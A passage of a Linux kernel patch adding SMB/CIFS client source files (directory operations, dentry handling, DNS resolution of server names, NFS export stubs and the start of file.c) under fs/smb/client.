++	return build_path_from_dentry_optional_prefix(direntry, page,
++						      prefix);
++}
++
++char *
++build_path_from_dentry_optional_prefix(struct dentry *direntry, void *page,
++				       bool prefix)
++{
++	int dfsplen;
++	int pplen = 0;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	char dirsep = CIFS_DIR_SEP(cifs_sb);
++	char *s;
++
++	if (unlikely(!page))
++		return ERR_PTR(-ENOMEM);
++
++	if (prefix)
++		dfsplen = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1);
++	else
++		dfsplen = 0;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH)
++		pplen = cifs_sb->prepath ? strlen(cifs_sb->prepath) + 1 : 0;
++
++	s = dentry_path_raw(direntry, page, PATH_MAX);
++	if (IS_ERR(s))
++		return s;
++	if (!s[1])	// for root we want "", not "/"
++		s++;
++	if (s < (char *)page + pplen + dfsplen)
++		return ERR_PTR(-ENAMETOOLONG);
++	if (pplen) {
++		cifs_dbg(FYI, "using cifs_sb prepath <%s>\n", cifs_sb->prepath);
++		s -= pplen;
++		memcpy(s + 1, cifs_sb->prepath, pplen - 1);
++		*s = '/';
++	}
++	if (dirsep != '/') {
++		/* BB test paths to Windows with '/' in the midst of prepath */
++		char *p;
++
++		for (p = s; *p; p++)
++			if (*p == '/')
++				*p = dirsep;
++	}
++	if (dfsplen) {
++		s -= dfsplen;
++		memcpy(s, tcon->tree_name, dfsplen);
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS) {
++			int i;
++			for (i = 0; i < dfsplen; i++) {
++				if (s[i] == '\\')
++					s[i] = '/';
++			}
++		}
++	}
++	return s;
++}
++
++/*
++ * Don't allow path components longer than the server max.
++ * Don't allow the separator character in a path component.
++ * The VFS will not allow "/", but "\" is allowed by posix.
++ */
++static int
++check_name(struct dentry *direntry, struct cifs_tcon *tcon)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
++	int i;
++
++	if (unlikely(tcon->fsAttrInfo.MaxPathNameComponentLength &&
++		     direntry->d_name.len >
++		     le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength)))
++		return -ENAMETOOLONG;
++
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS)) {
++		for (i = 0; i < direntry->d_name.len; i++) {
++			if (direntry->d_name.name[i] == '\\') {
++				cifs_dbg(FYI, "Invalid file name\n");
++				return -EINVAL;
++			}
++		}
++	}
++	return 0;
++}
++
++
++/* Inode operations in similar order to how they appear in Linux file fs.h */
++
++static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned int xid,
++			  struct tcon_link *tlink, unsigned int oflags, umode_t mode, __u32 *oplock,
++			  struct cifs_fid *fid, struct cifs_open_info_data *buf)
++{
++	int rc = -ENOENT;
++	int create_options = CREATE_NOT_DIR;
++	int desired_access;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifs_tcon *tcon = tlink_tcon(tlink);
++	const char *full_path;
++	void *page = alloc_dentry_path();
++	struct inode *newinode = NULL;
++	int disposition;
++	struct TCP_Server_Info *server = tcon->ses->server;
++	struct cifs_open_parms oparms;
++
++	*oplock = 0;
++	if (tcon->ses->server->oplocks)
++		*oplock = REQ_OPLOCK;
++
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		free_dentry_path(page);
++		return PTR_ERR(full_path);
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (tcon->unix_ext && cap_unix(tcon->ses) && !tcon->broken_posix_open &&
++	    (CIFS_UNIX_POSIX_PATH_OPS_CAP &
++			le64_to_cpu(tcon->fsUnixInfo.Capability))) {
++		rc = cifs_posix_open(full_path, &newinode, inode->i_sb, mode,
++				     oflags, oplock, &fid->netfid, xid);
++		switch (rc) {
++		case 0:
++			if (newinode == NULL) {
++				/* query inode info */
++				goto cifs_create_get_file_info;
++			}
++
++			if (S_ISDIR(newinode->i_mode)) {
++				CIFSSMBClose(xid, tcon, fid->netfid);
++				iput(newinode);
++				rc = -EISDIR;
++				goto out;
++			}
++
++			if (!S_ISREG(newinode->i_mode)) {
++				/*
++				 * The server may allow us to open things like
++				 * FIFOs, but the client isn't set up to deal
++				 * with that. If it's not a regular file, just
++				 * close it and proceed as if it were a normal
++				 * lookup.
++				 */
++				CIFSSMBClose(xid, tcon, fid->netfid);
++				goto cifs_create_get_file_info;
++			}
++			/* success, no need to query */
++			goto cifs_create_set_dentry;
++
++		case -ENOENT:
++			goto cifs_create_get_file_info;
++
++		case -EIO:
++		case -EINVAL:
++			/*
++			 * EIO could indicate that (posix open) operation is not
++			 * supported, despite what server claimed in capability
++			 * negotiation.
++			 *
++			 * POSIX open in samba versions 3.3.1 and earlier could
++			 * incorrectly fail with invalid parameter.
++			 */
++			tcon->broken_posix_open = true;
++			break;
++
++		case -EREMOTE:
++		case -EOPNOTSUPP:
++			/*
++			 * EREMOTE indicates DFS junction, which is not handled
++			 * in posix open.  If either that or op not supported
++			 * returned, follow the normal lookup.
++			 */
++			break;
++
++		default:
++			goto out;
++		}
++		/*
++		 * fallthrough to retry, using older open call, this is case
++		 * where server does not support this SMB level, and falsely
++		 * claims capability (also get here for DFS case which should be
++		 * rare for path not covered on files)
++		 */
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	desired_access = 0;
++	if (OPEN_FMODE(oflags) & FMODE_READ)
++		desired_access |= GENERIC_READ; /* is this too little? */
++	if (OPEN_FMODE(oflags) & FMODE_WRITE)
++		desired_access |= GENERIC_WRITE;
++
++	disposition = FILE_OVERWRITE_IF;
++	if ((oflags & (O_CREAT | O_EXCL)) == (O_CREAT | O_EXCL))
++		disposition = FILE_CREATE;
++	else if ((oflags & (O_CREAT | O_TRUNC)) == (O_CREAT | O_TRUNC))
++		disposition = FILE_OVERWRITE_IF;
++	else if ((oflags & O_CREAT) == O_CREAT)
++		disposition = FILE_OPEN_IF;
++	else
++		cifs_dbg(FYI, "Create flag not set in create function\n");
++
++	/*
++	 * BB add processing to set equivalent of mode - e.g. via CreateX with
++	 * ACLs
++	 */
++
++	if (!server->ops->open) {
++		rc = -ENOSYS;
++		goto out;
++	}
++
++	/*
++	 * if we're not using unix extensions, see if we need to set
++	 * ATTR_READONLY on the create call
++	 */
++	if (!tcon->unix_ext && (mode & S_IWUGO) == 0)
++		create_options |= CREATE_OPTION_READONLY;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = fid,
++		.mode = mode,
++	};
++	rc = server->ops->open(xid, &oparms, oplock, buf);
++	if (rc) {
++		cifs_dbg(FYI, "cifs_create returned 0x%x\n", rc);
++		goto out;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	/*
++	 * If Open reported that we actually created a file then we now have to
++	 * set the mode if possible.
++	 */
++	if ((tcon->unix_ext) && (*oplock & CIFS_CREATE_ACTION)) {
++		struct cifs_unix_set_info_args args = {
++				.mode	= mode,
++				.ctime	= NO_CHANGE_64,
++				.atime	= NO_CHANGE_64,
++				.mtime	= NO_CHANGE_64,
++				.device	= 0,
++		};
++
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
++			args.uid = current_fsuid();
++			if (inode->i_mode & S_ISGID)
++				args.gid = inode->i_gid;
++			else
++				args.gid = current_fsgid();
++		} else {
++			args.uid = INVALID_UID; /* no change */
++			args.gid = INVALID_GID; /* no change */
++		}
++		CIFSSMBUnixSetFileInfo(xid, tcon, &args, fid->netfid,
++				       current->tgid);
++	} else {
++		/*
++		 * BB implement mode setting via Windows security
++		 * descriptors e.g.
++		 */
++		/* CIFSSMBWinSetPerms(xid,tcon,path,mode,-1,-1,nls);*/
++
++		/* Could set r/o dos attribute if mode & 0222 == 0 */
++	}
++
++cifs_create_get_file_info:
++	/* server might mask mode so we have to query for it */
++	if (tcon->unix_ext)
++		rc = cifs_get_inode_info_unix(&newinode, full_path, inode->i_sb,
++					      xid);
++	else {
++#else
++	{
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		/* TODO: Add support for calling POSIX query info here, but passing in fid */
++		rc = cifs_get_inode_info(&newinode, full_path, buf, inode->i_sb, xid, fid);
++		if (newinode) {
++			if (server->ops->set_lease_key)
++				server->ops->set_lease_key(newinode, fid);
++			if ((*oplock & CIFS_CREATE_ACTION) && S_ISREG(newinode->i_mode)) {
++				if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)
++					newinode->i_mode = mode;
++				if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
++					newinode->i_uid = current_fsuid();
++					if (inode->i_mode & S_ISGID)
++						newinode->i_gid = inode->i_gid;
++					else
++						newinode->i_gid = current_fsgid();
++				}
++			}
++		}
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++cifs_create_set_dentry:
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	if (rc != 0) {
++		cifs_dbg(FYI, "Create worked, get_inode_info failed rc = %d\n",
++			 rc);
++		goto out_err;
++	}
++
++	if (newinode)
++		if (S_ISDIR(newinode->i_mode)) {
++			rc = -EISDIR;
++			goto out_err;
++		}
++
++	d_drop(direntry);
++	d_add(direntry, newinode);
++
++out:
++	free_dentry_path(page);
++	return rc;
++
++out_err:
++	if (server->ops->close)
++		server->ops->close(xid, tcon, fid);
++	if (newinode)
++		iput(newinode);
++	goto out;
++}
++
++int
++cifs_atomic_open(struct inode *inode, struct dentry *direntry,
++		 struct file *file, unsigned oflags, umode_t mode)
++{
++	int rc;
++	unsigned int xid;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct cifs_fid fid = {};
++	struct cifs_pending_open open;
++	__u32 oplock;
++	struct cifsFileInfo *file_info;
++	struct cifs_open_info_data buf = {};
++
++	if (unlikely(cifs_forced_shutdown(CIFS_SB(inode->i_sb))))
++		return -EIO;
++
++	/*
++	 * Posix open is only called (at lookup time) for file create now. For
++	 * opens (rather than creates), because we do not know if it is a file
++	 * or directory yet, and current Samba no longer allows us to do posix
++	 * open on dirs, we could end up wasting an open call on what turns out
++	 * to be a dir. For file opens, we wait to call posix open till
++	 * cifs_open.  It could be added to atomic_open in the future but the
++	 * performance tradeoff of the extra network request when EISDIR or
++	 * EACCES is returned would have to be weighed against the 50% reduction
++	 * in network traffic in the other paths.
++	 */
++	if (!(oflags & O_CREAT)) {
++		struct dentry *res;
++
++		/*
++		 * Check for hashed negative dentry. We have already revalidated
++		 * the dentry and it is fine. No need to perform another lookup.
++		 */
++		if (!d_in_lookup(direntry))
++			return -ENOENT;
++
++		res = cifs_lookup(inode, direntry, 0);
++		if (IS_ERR(res))
++			return PTR_ERR(res);
++
++		return finish_no_open(file, res);
++	}
++
++	xid = get_xid();
++
++	cifs_dbg(FYI, "parent inode = 0x%p name is: %pd and dentry = 0x%p\n",
++		 inode, direntry, direntry);
++
++	tlink = cifs_sb_tlink(CIFS_SB(inode->i_sb));
++	if (IS_ERR(tlink)) {
++		rc = PTR_ERR(tlink);
++		goto out_free_xid;
++	}
++
++	tcon = tlink_tcon(tlink);
++
++	rc = check_name(direntry, tcon);
++	if (rc)
++		goto out;
++
++	server = tcon->ses->server;
++
++	if (server->ops->new_lease_key)
++		server->ops->new_lease_key(&fid);
++
++	cifs_add_pending_open(&fid, tlink, &open);
++
++	rc = cifs_do_create(inode, direntry, xid, tlink, oflags, mode,
++			    &oplock, &fid, &buf);
++	if (rc) {
++		cifs_del_pending_open(&open);
++		goto out;
++	}
++
++	if ((oflags & (O_CREAT | O_EXCL)) == (O_CREAT | O_EXCL))
++		file->f_mode |= FMODE_CREATED;
++
++	rc = finish_open(file, direntry, generic_file_open);
++	if (rc) {
++		if (server->ops->close)
++			server->ops->close(xid, tcon, &fid);
++		cifs_del_pending_open(&open);
++		goto out;
++	}
++
++	if (file->f_flags & O_DIRECT &&
++	    CIFS_SB(inode->i_sb)->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO) {
++		if (CIFS_SB(inode->i_sb)->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
++			file->f_op = &cifs_file_direct_nobrl_ops;
++		else
++			file->f_op = &cifs_file_direct_ops;
++		}
++
++	file_info = cifs_new_fileinfo(&fid, file, tlink, oplock, buf.symlink_target);
++	if (file_info == NULL) {
++		if (server->ops->close)
++			server->ops->close(xid, tcon, &fid);
++		cifs_del_pending_open(&open);
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	fscache_use_cookie(cifs_inode_cookie(file_inode(file)),
++			   file->f_mode & FMODE_WRITE);
++
++out:
++	cifs_put_tlink(tlink);
++out_free_xid:
++	free_xid(xid);
++	cifs_free_open_info(&buf);
++	return rc;
++}
++
++int cifs_create(struct user_namespace *mnt_userns, struct inode *inode,
++		struct dentry *direntry, umode_t mode, bool excl)
++{
++	int rc;
++	unsigned int xid = get_xid();
++	/*
++	 * BB below access is probably too much for mknod to request
++	 *    but we have to do query and setpathinfo so requesting
++	 *    less could fail (unless we want to request getatr and setatr
++	 *    permissions (only).  At least for POSIX we do not have to
++	 *    request so much.
++	 */
++	unsigned oflags = O_EXCL | O_CREAT | O_RDWR;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct cifs_fid fid;
++	__u32 oplock;
++	struct cifs_open_info_data buf = {};
++
++	cifs_dbg(FYI, "cifs_create parent inode = 0x%p name is: %pd and dentry = 0x%p\n",
++		 inode, direntry, direntry);
++
++	if (unlikely(cifs_forced_shutdown(CIFS_SB(inode->i_sb)))) {
++		rc = -EIO;
++		goto out_free_xid;
++	}
++
++	tlink = cifs_sb_tlink(CIFS_SB(inode->i_sb));
++	rc = PTR_ERR(tlink);
++	if (IS_ERR(tlink))
++		goto out_free_xid;
++
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
++	if (server->ops->new_lease_key)
++		server->ops->new_lease_key(&fid);
++
++	rc = cifs_do_create(inode, direntry, xid, tlink, oflags, mode, &oplock, &fid, &buf);
++	if (!rc && server->ops->close)
++		server->ops->close(xid, tcon, &fid);
++
++	cifs_free_open_info(&buf);
++	cifs_put_tlink(tlink);
++out_free_xid:
++	free_xid(xid);
++	return rc;
++}
++
++int cifs_mknod(struct user_namespace *mnt_userns, struct inode *inode,
++	       struct dentry *direntry, umode_t mode, dev_t device_number)
++{
++	int rc = -EPERM;
++	unsigned int xid;
++	struct cifs_sb_info *cifs_sb;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	const char *full_path;
++	void *page;
++
++	if (!old_valid_dev(device_number))
++		return -EINVAL;
++
++	cifs_sb = CIFS_SB(inode->i_sb);
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++
++	page = alloc_dentry_path();
++	tcon = tlink_tcon(tlink);
++	xid = get_xid();
++
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto mknod_out;
++	}
++
++	rc = tcon->ses->server->ops->make_node(xid, inode, direntry, tcon,
++					       full_path, mode,
++					       device_number);
++
++mknod_out:
++	free_dentry_path(page);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++struct dentry *
++cifs_lookup(struct inode *parent_dir_inode, struct dentry *direntry,
++	    unsigned int flags)
++{
++	unsigned int xid;
++	int rc = 0; /* to get around spurious gcc warning, set to zero here */
++	struct cifs_sb_info *cifs_sb;
++	struct tcon_link *tlink;
++	struct cifs_tcon *pTcon;
++	struct inode *newInode = NULL;
++	const char *full_path;
++	void *page;
++	int retry_count = 0;
++
++	xid = get_xid();
++
++	cifs_dbg(FYI, "parent inode = 0x%p name is: %pd and dentry = 0x%p\n",
++		 parent_dir_inode, direntry, direntry);
++
++	/* check whether path exists */
++
++	cifs_sb = CIFS_SB(parent_dir_inode->i_sb);
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink)) {
++		free_xid(xid);
++		return ERR_CAST(tlink);
++	}
++	pTcon = tlink_tcon(tlink);
++
++	rc = check_name(direntry, pTcon);
++	if (unlikely(rc)) {
++		cifs_put_tlink(tlink);
++		free_xid(xid);
++		return ERR_PTR(rc);
++	}
++
++	/* can not grab the rename sem here since it would
++	deadlock in the cases (beginning of sys_rename itself)
++	in which we already have the sb rename sem */
++	page = alloc_dentry_path();
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		cifs_put_tlink(tlink);
++		free_xid(xid);
++		free_dentry_path(page);
++		return ERR_CAST(full_path);
++	}
++
++	if (d_really_is_positive(direntry)) {
++		cifs_dbg(FYI, "non-NULL inode in lookup\n");
++	} else {
++		cifs_dbg(FYI, "NULL inode in lookup\n");
++	}
++	cifs_dbg(FYI, "Full path: %s inode = 0x%p\n",
++		 full_path, d_inode(direntry));
++
++again:
++	if (pTcon->posix_extensions)
++		rc = smb311_posix_get_inode_info(&newInode, full_path, parent_dir_inode->i_sb, xid);
++	else if (pTcon->unix_ext) {
++		rc = cifs_get_inode_info_unix(&newInode, full_path,
++					      parent_dir_inode->i_sb, xid);
++	} else {
++		rc = cifs_get_inode_info(&newInode, full_path, NULL,
++				parent_dir_inode->i_sb, xid, NULL);
++	}
++
++	if (rc == 0) {
++		/* since paths are not looked up by component - the parent
++		   directories are presumed to be good here */
++		renew_parental_timestamps(direntry);
++	} else if (rc == -EAGAIN && retry_count++ < 10) {
++		goto again;
++	} else if (rc == -ENOENT) {
++		cifs_set_time(direntry, jiffies);
++		newInode = NULL;
++	} else {
++		if (rc != -EACCES) {
++			cifs_dbg(FYI, "Unexpected lookup error %d\n", rc);
++			/* We special case check for Access Denied - since that
++			is a common return code */
++		}
++		newInode = ERR_PTR(rc);
++	}
++	free_dentry_path(page);
++	cifs_put_tlink(tlink);
++	free_xid(xid);
++	return d_splice_alias(newInode, direntry);
++}
++
++static int
++cifs_d_revalidate(struct dentry *direntry, unsigned int flags)
++{
++	struct inode *inode;
++	int rc;
++
++	if (flags & LOOKUP_RCU)
++		return -ECHILD;
++
++	if (d_really_is_positive(direntry)) {
++		inode = d_inode(direntry);
++		if ((flags & LOOKUP_REVAL) && !CIFS_CACHE_READ(CIFS_I(inode)))
++			CIFS_I(inode)->time = 0; /* force reval */
++
++		rc = cifs_revalidate_dentry(direntry);
++		if (rc) {
++			cifs_dbg(FYI, "cifs_revalidate_dentry failed with rc=%d", rc);
++			switch (rc) {
++			case -ENOENT:
++			case -ESTALE:
++				/*
++				 * Those errors mean the dentry is invalid
++				 * (file was deleted or recreated)
++				 */
++				return 0;
++			default:
++				/*
++				 * Otherwise some unexpected error happened
++				 * report it as-is to VFS layer
++				 */
++				return rc;
++			}
++		}
++		else {
++			/*
++			 * If the inode wasn't known to be a dfs entry when
++			 * the dentry was instantiated, such as when created
++			 * via ->readdir(), it needs to be set now since the
++			 * attributes will have been updated by
++			 * cifs_revalidate_dentry().
++			 */
++			if (IS_AUTOMOUNT(inode) &&
++			   !(direntry->d_flags & DCACHE_NEED_AUTOMOUNT)) {
++				spin_lock(&direntry->d_lock);
++				direntry->d_flags |= DCACHE_NEED_AUTOMOUNT;
++				spin_unlock(&direntry->d_lock);
++			}
++
++			return 1;
++		}
++	}
++
++	/*
++	 * This may be nfsd (or something), anyway, we can't see the
++	 * intent of this. So, since this can be for creation, drop it.
++	 */
++	if (!flags)
++		return 0;
++
++	/*
++	 * Drop the negative dentry, in order to make sure to use the
++	 * case sensitive name which is specified by user if this is
++	 * for creation.
++	 */
++	if (flags & (LOOKUP_CREATE | LOOKUP_RENAME_TARGET))
++		return 0;
++
++	if (time_after(jiffies, cifs_get_time(direntry) + HZ) || !lookupCacheEnabled)
++		return 0;
++
++	return 1;
++}
++
++/* static int cifs_d_delete(struct dentry *direntry)
++{
++	int rc = 0;
++
++	cifs_dbg(FYI, "In cifs d_delete, name = %pd\n", direntry);
++
++	return rc;
++}     */
++
++const struct dentry_operations cifs_dentry_ops = {
++	.d_revalidate = cifs_d_revalidate,
++	.d_automount = cifs_dfs_d_automount,
++/* d_delete:       cifs_d_delete,      */ /* not needed except for debugging */
++};
++
++static int cifs_ci_hash(const struct dentry *dentry, struct qstr *q)
++{
++	struct nls_table *codepage = CIFS_SB(dentry->d_sb)->local_nls;
++	unsigned long hash;
++	wchar_t c;
++	int i, charlen;
++
++	hash = init_name_hash(dentry);
++	for (i = 0; i < q->len; i += charlen) {
++		charlen = codepage->char2uni(&q->name[i], q->len - i, &c);
++		/* error out if we can't convert the character */
++		if (unlikely(charlen < 0))
++			return charlen;
++		hash = partial_name_hash(cifs_toupper(c), hash);
++	}
++	q->hash = end_name_hash(hash);
++
++	return 0;
++}
++
++static int cifs_ci_compare(const struct dentry *dentry,
++		unsigned int len, const char *str, const struct qstr *name)
++{
++	struct nls_table *codepage = CIFS_SB(dentry->d_sb)->local_nls;
++	wchar_t c1, c2;
++	int i, l1, l2;
++
++	/*
++	 * We make the assumption here that uppercase characters in the local
++	 * codepage are always the same length as their lowercase counterparts.
++	 *
++	 * If that's ever not the case, then this will fail to match it.
++	 */
++	if (name->len != len)
++		return 1;
++
++	for (i = 0; i < len; i += l1) {
++		/* Convert characters in both strings to UTF-16. */
++		l1 = codepage->char2uni(&str[i], len - i, &c1);
++		l2 = codepage->char2uni(&name->name[i], name->len - i, &c2);
++
++		/*
++		 * If we can't convert either character, just declare it to
++		 * be 1 byte long and compare the original byte.
++		 */
++		if (unlikely(l1 < 0 && l2 < 0)) {
++			if (str[i] != name->name[i])
++				return 1;
++			l1 = 1;
++			continue;
++		}
++
++		/*
++		 * Here, we again ass|u|me that upper/lowercase versions of
++		 * a character are the same length in the local NLS.
++		 */
++		if (l1 != l2)
++			return 1;
++
++		/* Now compare uppercase versions of these characters */
++		if (cifs_toupper(c1) != cifs_toupper(c2))
++			return 1;
++	}
++
++	return 0;
++}
++
++const struct dentry_operations cifs_ci_dentry_ops = {
++	.d_revalidate = cifs_d_revalidate,
++	.d_hash = cifs_ci_hash,
++	.d_compare = cifs_ci_compare,
++	.d_automount = cifs_dfs_d_automount,
++};
+diff --git a/fs/smb/client/dns_resolve.c b/fs/smb/client/dns_resolve.c
+new file mode 100644
+index 0000000000000..0458d28d71aa6
+--- /dev/null
++++ b/fs/smb/client/dns_resolve.c
+@@ -0,0 +1,89 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (c) 2007 Igor Mammedov
++ *   Author(s): Igor Mammedov (niallain@gmail.com)
++ *              Steve French (sfrench@us.ibm.com)
++ *              Wang Lei (wang840925@gmail.com)
++ *		David Howells (dhowells@redhat.com)
++ *
++ *   Contains the CIFS DFS upcall routines used for hostname to
++ *   IP address translation.
++ *
++ */
++
++#include <linux/slab.h>
++#include <linux/dns_resolver.h>
++#include "dns_resolve.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++
++/**
++ * dns_resolve_server_name_to_ip - Resolve UNC server name to ip address.
++ * @unc: UNC path specifying the server (with '/' as delimiter)
++ * @ip_addr: Where to return the IP address.
++ * @expiry: Where to return the expiry time for the dns record.
++ *
++ * The IP address will be returned in string form, and the caller is
++ * responsible for freeing it.
++ *
++ * Returns length of result on success, -ve on error.
++ */
++int
++dns_resolve_server_name_to_ip(const char *unc, char **ip_addr, time64_t *expiry)
++{
++	struct sockaddr_storage ss;
++	const char *hostname, *sep;
++	char *name;
++	int len, rc;
++
++	if (!ip_addr || !unc)
++		return -EINVAL;
++
++	len = strlen(unc);
++	if (len < 3) {
++		cifs_dbg(FYI, "%s: unc is too short: %s\n", __func__, unc);
++		return -EINVAL;
++	}
++
++	/* Discount leading slashes for cifs */
++	len -= 2;
++	hostname = unc + 2;
++
++	/* Search for server name delimiter */
++	sep = memchr(hostname, '/', len);
++	if (sep)
++		len = sep - hostname;
++	else
++		cifs_dbg(FYI, "%s: probably server name is whole unc: %s\n",
++			 __func__, unc);
++
++	/* Try to interpret hostname as an IPv4 or IPv6 address */
++	rc = cifs_convert_address((struct sockaddr *)&ss, hostname, len);
++	if (rc > 0)
++		goto name_is_IP_address;
++
++	/* Perform the upcall */
++	rc = dns_query(current->nsproxy->net_ns, NULL, hostname, len,
++		       NULL, ip_addr, expiry, false);
++	if (rc < 0)
++		cifs_dbg(FYI, "%s: unable to resolve: %*.*s\n",
++			 __func__, len, len, hostname);
++	else
++		cifs_dbg(FYI, "%s: resolved: %*.*s to %s expiry %llu\n",
++			 __func__, len, len, hostname, *ip_addr,
++			 expiry ? (*expiry) : 0);
++	return rc;
++
++name_is_IP_address:
++	name = kmalloc(len + 1, GFP_KERNEL);
++	if (!name)
++		return -ENOMEM;
++	memcpy(name, hostname, len);
++	name[len] = 0;
++	cifs_dbg(FYI, "%s: unc is IP, skipping dns upcall: %s\n",
++		 __func__, name);
++	*ip_addr = name;
++	return 0;
++}
+diff --git a/fs/smb/client/dns_resolve.h b/fs/smb/client/dns_resolve.h
+new file mode 100644
+index 0000000000000..afc0df381246b
+--- /dev/null
++++ b/fs/smb/client/dns_resolve.h
+@@ -0,0 +1,18 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *   DNS Resolver upcall management for CIFS DFS
++ *   Handles host name to IP address resolution
++ *
++ *   Copyright (c) International Business Machines  Corp., 2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#ifndef _DNS_RESOLVE_H
++#define _DNS_RESOLVE_H
++
++#ifdef __KERNEL__
++extern int dns_resolve_server_name_to_ip(const char *unc, char **ip_addr, time64_t *expiry);
++#endif /* KERNEL */
++
++#endif /* _DNS_RESOLVE_H */
+diff --git a/fs/smb/client/export.c b/fs/smb/client/export.c
+new file mode 100644
+index 0000000000000..37c28415df1e0
+--- /dev/null
++++ b/fs/smb/client/export.c
+@@ -0,0 +1,54 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2007
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ *   Common Internet FileSystem (CIFS) client
++ *
++ *   Operations related to support for exporting files via NFSD
++ *
++ */
++
++ /*
++  * See Documentation/filesystems/nfs/exporting.rst
++  * and examples in fs/exportfs
++  *
++  * Since cifs is a network file system, an "fsid" must be included for
++  * any nfs exports file entries which refer to cifs paths.  In addition
++  * the cifs mount must be mounted with the "serverino" option (ie use stable
++  * server inode numbers instead of locally generated temporary ones).
++  * Although cifs inodes do not use generation numbers (have generation number
++  * of zero) - the inode number alone should be good enough for simple cases
++  * in which users want to export cifs shares with NFS. The decode and encode
++  * could be improved by using a new routine which expects 64 bit inode numbers
++  * instead of the default 32 bit routines in fs/exportfs
++  *
++  */
++
++#include <linux/fs.h>
++#include <linux/exportfs.h>
++#include "cifsglob.h"
++#include "cifs_debug.h"
++#include "cifsfs.h"
++
++#ifdef CONFIG_CIFS_NFSD_EXPORT
++static struct dentry *cifs_get_parent(struct dentry *dentry)
++{
++	/* BB need to add code here eventually to enable export via NFSD */
++	cifs_dbg(FYI, "get parent for %p\n", dentry);
++	return ERR_PTR(-EACCES);
++}
++
++const struct export_operations cifs_export_ops = {
++	.get_parent = cifs_get_parent,
++/*	Following five export operations are unneeded so far and can default:
++	.get_dentry =
++	.get_name =
++	.find_exported_dentry =
++	.decode_fh =
++	.encode_fs =  */
++};
++
++#endif /* CONFIG_CIFS_NFSD_EXPORT */
++
+diff --git a/fs/smb/client/file.c b/fs/smb/client/file.c
+new file mode 100644
+index 0000000000000..87dcffece7623
+--- /dev/null
++++ b/fs/smb/client/file.c
+@@ -0,0 +1,5290 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   vfs operations that deal with files
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2010
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Jeremy Allison (jra@samba.org)
++ *
++ */
++#include <linux/fs.h>
++#include <linux/backing-dev.h>
++#include <linux/stat.h>
++#include <linux/fcntl.h>
++#include <linux/pagemap.h>
++#include <linux/pagevec.h>
++#include <linux/writeback.h>
++#include <linux/task_io_accounting_ops.h>
++#include <linux/delay.h>
++#include <linux/mount.h>
++#include <linux/slab.h>
++#include <linux/swap.h>
++#include <linux/mm.h>
++#include <asm/div64.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "smb2proto.h"
++#include "cifs_unicode.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "fscache.h"
++#include "smbdirect.h"
++#include "fs_context.h"
++#include "cifs_ioctl.h"
++#include "cached_dir.h"
++
++/*
++ * Mark as invalid, all open files on tree connections since they
++ * were closed when session to server was lost.
++ */
++void
++cifs_mark_open_files_invalid(struct cifs_tcon *tcon)
++{
++	struct cifsFileInfo *open_file = NULL;
++	struct list_head *tmp;
++	struct list_head *tmp1;
++
++	/* only send once per connect */
++	spin_lock(&tcon->ses->ses_lock);
++	if ((tcon->ses->ses_status != SES_GOOD) || (tcon->status != TID_NEED_RECON)) {
++		spin_unlock(&tcon->ses->ses_lock);
++		return;
++	}
